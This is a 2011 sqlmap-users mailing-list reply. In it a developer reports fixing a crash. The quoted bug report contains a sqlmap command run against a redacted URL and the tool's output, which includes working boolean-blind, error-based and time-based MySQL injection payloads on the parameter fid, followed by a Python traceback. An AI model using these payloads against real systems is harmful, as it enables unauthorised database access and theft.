Re: [sqlmap-users] a new and i hope the last bug for 2010
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] a new and i hope the last bug for 2010
|
From: Miroslav S. <mir...@gm...> - 2011-01-01 12:23:24
|
Hi. Find it fixed in the latest commit. There is still an issue that we haven't "adjusted" xml structure of the output xml session file with the latest changes. Will do. KR, and Happy New Year :) On Fri, Dec 31, 2010 at 7:56 PM, <ra...@jo...> wrote: > C:\pentest\sqlmap-0.9>sqlmap -u " > http://xxxxxxxxxxxxxxxxxxxx.xxx/retrievePhoto.php?fid=236" > --auth-type=basic --auth-cred=xxxx:xxxx -a C:\user-agents.txt --level 5 > --risk 3 -x c:\xxxxx > > sqlmap/0.9-dev - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [*] starting at: 19:40:11 > > [19:40:12] [INFO] fetched random HTTP User-Agent header from file > 'C:\user-agents.txt': Opera/9.00 (Wii; U; ; 1038-58; Wii Shop Channel/1.0; > en) > [19:40:12] [INFO] using 'C:\pentest\sqlmap-0.9\output\xxxxx.xxxx\session' > as session file > [19:40:15] [INFO] resuming injection data from session file > [19:40:15] [INFO] resuming back-end DBMS 'mysql 5.0' from session file > [19:40:15] [INFO] resuming back-end DBMS operating system 'None' from > session file > [19:40:15] [INFO] resuming back-end DBMS 'mysql 5' from session file > [19:40:15] [INFO] resuming back-end DBMS operating system 'None' from > session file > [19:40:15] [INFO] resuming back-end DBMS operating system 'None' from > session file > [19:40:53] [INFO] testing connection to the target url > sqlmap identified the following injection points with 0 HTTP(s) requests: > --- > Place: GET > Parameter: fid > Type: boolean-based blind > Title: AND boolean-based blind - WHERE clause > Payload: fid=236" AND 7994=7994 AND "zBkq"="zBkq > > Type: error-based > Title: MySQL >= 5.0 AND error-based - WHERE clause > Payload: fid=236" AND (SELECT 1744 FROM(SELECT > COUNT(*),CONCAT(CHAR(58,101,115,110,58),(SELECT (CASE WHEN (1744=1744) THEN > 1 ELSE 0 END)),CHAR(58,113,104,110,58),FLOOR(RAND(0)*2))x FROM > information_schema.tables GROUP BY x)a) AND "EkEX"="EkEX > > Type: AND/OR time-based blind > Title: MySQL > 5.0.11 AND time-based blind > Payload: fid=236" AND SLEEP(5) AND "Ftwr"="Ftwr > --- > > > [19:40:55] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run > with the latest development version from the Subversion repository. If the > exception persists, please send by e-mail to > sql...@li... the command line, the following text > and any information needed to reproduce the bug. The developers will try to > reproduce the bug, fix it accordingly and get back to you. > sqlmap version: 0.9-dev > Python version: 2.6.6 > Operating system: nt > Traceback (most recent call last): > File "C:\pentest\sqlmap-0.9\sqlmap.py", line 80, in main > start() > File "C:\pentest\sqlmap-0.9\lib\controller\controller.py", > line 387, in start > __showInjections() > File "C:\pentest\sqlmap-0.9\lib\controller\controller.py", > line 121, in __showInjections > dumper.technic(header, data) > File "C:\pentest\sqlmap-0.9\lib\core\dump.py", line 93, in > technic > self.string(header, data) > File "C:\pentest\sqlmap-0.9\lib\core\dump.py", line 65, in > string > self.__write("%s:\n---\n%s\n---\n" % (header, data)) > File "C:\pentest\sqlmap-0.9\lib\core\dump.py", line 38, in > __write > self.__outputFP.write(text) > AttributeError: 'NoneType' object has no attribute 'write' > C:\pentest\sqlmap-0.9> > > > I wish you all a Happy New Year :) > > > ------------------------------------------------------------------------------ > Learn how Oracle Real Application Clusters (RAC) One Node allows customers > to consolidate database storage, standardize their database environment, > and, > should the need arise, upgrade to a full multi-node Oracle RAC database > without downtime or disruption > http://p.sf.net/sfu/oracle-sfdevnl > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
